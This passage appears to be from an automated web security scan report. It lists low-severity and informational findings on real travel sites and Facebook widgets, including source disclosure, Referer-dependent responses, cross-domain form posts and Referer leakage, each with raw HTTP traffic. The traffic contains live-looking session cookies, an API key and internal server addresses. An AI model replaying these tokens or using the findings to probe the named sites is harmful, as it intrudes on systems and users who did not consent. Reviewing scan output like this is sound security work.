Cookie: stop_mobi=yes; Cookie=R4252675302; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; ak_location=US,CA,SANJOSE,807; Ncl_region=CA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sat, 01 Oct 2011 22:30:21 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Ncl-SLog: (null)
Content-Type: application/x-javascript
Content-Length: 624082
Cache-Control: max-age=26594
Expires: Mon, 03 Oct 2011 20:10:04 GMT
Date: Mon, 03 Oct 2011 12:46:50 GMT
Connection: close

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
e++)c.call(d,e)};b.breakLoop=function(){throw r;};b.mixin=function(a){i(b.functions(a),function(c){G(c,b[c]=a[c])})};var H=0;b.uniqueId=function(a){var c=H++;return a?a+c:c};b.templateSettings={start:"<%",end:"%>",interpolate:/<%=(.+?)%>
...[SNIP]...
14.7. http://www2.ncl.com/sites/default/files/js/js_d4e8bcb21875da0f05034d544fc4310d.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.ncl.com
Path:   /sites/default/files/js/js_d4e8bcb21875da0f05034d544fc4310d.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /sites/default/files/js/js_d4e8bcb21875da0f05034d544fc4310d.js HTTP/1.1
Host: www2.ncl.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: Cookie=R1788641230; ak_location=US,CA,SANJOSE,807; Ncl_region=CA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 02 Oct 2011 19:30:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Ncl-SLog: (null)
Content-Type: application/x-javascript
Content-Length: 615144
Cache-Control: max-age=27988
Expires: Mon, 03 Oct 2011 21:09:49 GMT
Date: Mon, 03 Oct 2011 13:23:21 GMT
Connection: close

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
e++)c.call(d,e)};b.breakLoop=function(){throw r;};b.mixin=function(a){i(b.functions(a),function(c){G(c,b[c]=a[c])})};var H=0;b.uniqueId=function(a){var c=H++;return a?a+c:c};b.templateSettings={start:"<%",end:"%>",interpolate:/<%=(.+?)%>
...[SNIP]...
15. Referer-dependent response  previous  next
There are 2 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

15.1. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Request 1

GET /widgets/fan.php?api_key=09addd37a06e06e413d53e5411603783&channel_url=http%3A%2F%2Fwww.cruisesonly.com%2F%3Ffbc_channel%3D1&id=50243286972&name=&width=280&connections=0&stream=&logobar=&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.6.125
X-Cnection: close
Date: Mon, 03 Oct 2011 12:40:49 GMT
Content-Length: 8515

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
<div id="connect_widget_4e89ad513823a7c39737241" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">45,168</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></sp
...[SNIP]...

Request 2

GET /widgets/fan.php?api_key=09addd37a06e06e413d53e5411603783&channel_url=http%3A%2F%2Fwww.cruisesonly.com%2F%3Ffbc_channel%3D1&id=50243286972&name=&width=280&connections=0&stream=&logobar=&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.39.123
X-Cnection: close
Date: Mon, 03 Oct 2011 12:40:53 GMT
Content-Length: 8487

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
<div id="connect_widget_4e89ad558fac38d58564971" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">45,168</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></sp
...[SNIP]...
15.2. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2F%23%21%2Froyalcaribbean&send=false&layout=button_count&width=85&show_faces=false&action=like&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.102.58
X-Cnection: close
Date: Mon, 03 Oct 2011 12:41:01 GMT
Content-Length: 23340

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e89ad5de7cb83a73921529" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">362K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">362K</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"8dc6391c",fb_dtsg:"AQAtXhbh",no_cookies:1,lhsh:"iAQBbrSZj"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){defer_until(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"","mobile":false,"nodeType":"link","externalURL":"http:\/\/www.facebook.com\/royalcaribbean","pageId":null,"widgetID":"connect_widget_4e89ad5de7cb83a73921529","alreadyConnected":false,"viewerIsAdmin":false,"adminUrl":"","showFaces":false,"useUnlikeLink":false,"layout":"button_count","locale":"en_US","commentWidgetMarkup":"","error":null,"autoRe
...[SNIP]...

Request 2

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2F%23%21%2Froyalcaribbean&send=false&layout=button_count&width=85&show_faces=false&action=like&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.133.61
X-Cnection: close
Date: Mon, 03 Oct 2011 12:41:09 GMT
Content-Length: 23302

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e89ad6528e874328910589" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">362K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">362K</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"4a6e3e46",fb_dtsg:"AQAtXhbh",no_cookies:1,lhsh:"eAQBxuzLJ"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){defer_until(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"","mobile":false,"nodeType":"link","externalURL":"http:\/\/www.facebook.com\/royalcaribbean","pageId":null,"widgetID":"connect_widget_4e89ad6528e874328910589","alreadyConnected":false,"viewerIsAdmin":false,"adminUrl":"","showFaces":false,"useUnlikeLink":false,"layout":"button_count","locale":"en_US","commentWidgetMarkup":"","error":null,"autoRe
...[SNIP]...
16. Cross-domain POST  previous  next
There are 4 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

16.1. http://www.kimptonhotels.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kimptonhotels.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain gc.synxis.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.kimptonhotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:52:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 92975


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>Kimpton Ho
...[SNIP]...
<div class="container-inside">

<form method="post" action="https://gc.synxis.com/rez.aspx" id="miniappform" target="_self">

   <!-- Reservaton system hiddens -->
...[SNIP]...
16.2. http://www.kimptonhotels.com/intouch/KIT_overview.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kimptonhotels.com
Path:   /intouch/KIT_overview.aspx

Issue detail

The page contains a form which POSTs data to the domain gc.synxis.com. The form contains the following fields:

Request

GET /intouch/KIT_overview.aspx HTTP/1.1
Host: www.kimptonhotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/search.aspx?q=xss&search.x=0&search.y=0&search=Search&output=xml_no_dtd&oe=UTF-8&ie=UTF-8&client=nonIFrame_frontend&site=default_collection&proxystylesheet=nonIFrame_frontend&filter=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hytzgqaaykmf3c55utfkf3ns; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635605933:ss=1317635583811; __utma=198844469.653864354.1317646382.1317646382.1317646382.1; __utmb=198844469.2.10.1317646382; __utmc=198844469; __utmz=198844469.1317646382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:53:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75799


<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Kimpton InTouch Guest Rewards and Loyalty Program</title>
<meta http-equiv="Content-Type" content="text/html;
...[SNIP]...
<div class="container-inside">

<form method="post" action="https://gc.synxis.com/rez.aspx" id="miniappform" target="_self">

   <!-- Reservaton system hiddens -->
...[SNIP]...
16.3. http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kimptonhotels.com
Path:   /restaurants/restaurant-reservations.aspx

Issue detail

The page contains a form which POSTs data to the domain gc.synxis.com. The form contains the following fields:

Request

GET /restaurants/restaurant-reservations.aspx HTTP/1.1
Host: www.kimptonhotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/intouch/KIT_overview.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hytzgqaaykmf3c55utfkf3ns; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635611005:ss=1317635583811; __utma=198844469.653864354.1317646382.1317646382.1317646382.1; __utmb=198844469.3.10.1317646382; __utmc=198844469; __utmz=198844469.1317646382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:53:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 144327


<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Gourmet Chef-Driven Restaurants in San Francisco and Major US Cities: Kimpton Hotels</title>
<meta http-equiv
...[SNIP]...
<div class="container-inside">

<form method="post" action="https://gc.synxis.com/rez.aspx" id="miniappform" target="_self">

   <!-- Reservaton system hiddens -->
...[SNIP]...
16.4. http://www.kimptonhotels.com/restaurants/restaurants.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kimptonhotels.com
Path:   /restaurants/restaurants.aspx

Issue detail

The page contains a form which POSTs data to the domain gc.synxis.com. The form contains the following fields:

Request

GET /restaurants/restaurants.aspx HTTP/1.1
Host: www.kimptonhotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/intouch/KIT_overview.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hytzgqaaykmf3c55utfkf3ns; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635611005:ss=1317635583811; __utma=198844469.653864354.1317646382.1317646382.1317646382.1; __utmb=198844469.3.10.1317646382; __utmc=198844469; __utmz=198844469.1317646382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:53:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171940


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head>
<title>Gourmet Chef
...[SNIP]...
<div class="container-inside">

<form method="post" action="https://gc.synxis.com/rez.aspx" id="miniappform" target="_self">

   <!-- Reservaton system hiddens -->
...[SNIP]...
17. Cross-domain Referer leakage  previous  next
There are 65 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

17.1. http://b3.mookie1.com/2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95?cS=NAVBAR&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/beforeyouboard/home.do?cS=NAVBAR
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 318
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/beforeyouboard/home.do/1613659149/x95/default/empty.gif/4d686437616b364a72577341437a4175?x" target="_top"><IMG SRC="http://imagen04.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
17.2. http://b3.mookie1.com/2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95?cS=NAVBAR&pnav=3&snav=1&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/dealsandmore/hotdeals.do?cS=NAVBAR&pnav=3&snav=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 320
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/dealsandmore/hotdeals.do/1266214512/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top"><IMG SRC="http://imagen04.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
17.3. http://b3.mookie1.com/2/royalcaribbean.com/home.do/6905219797@x95  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/home.do/6905219797@x95

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /2/royalcaribbean.com/home.do/6905219797@x95?_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

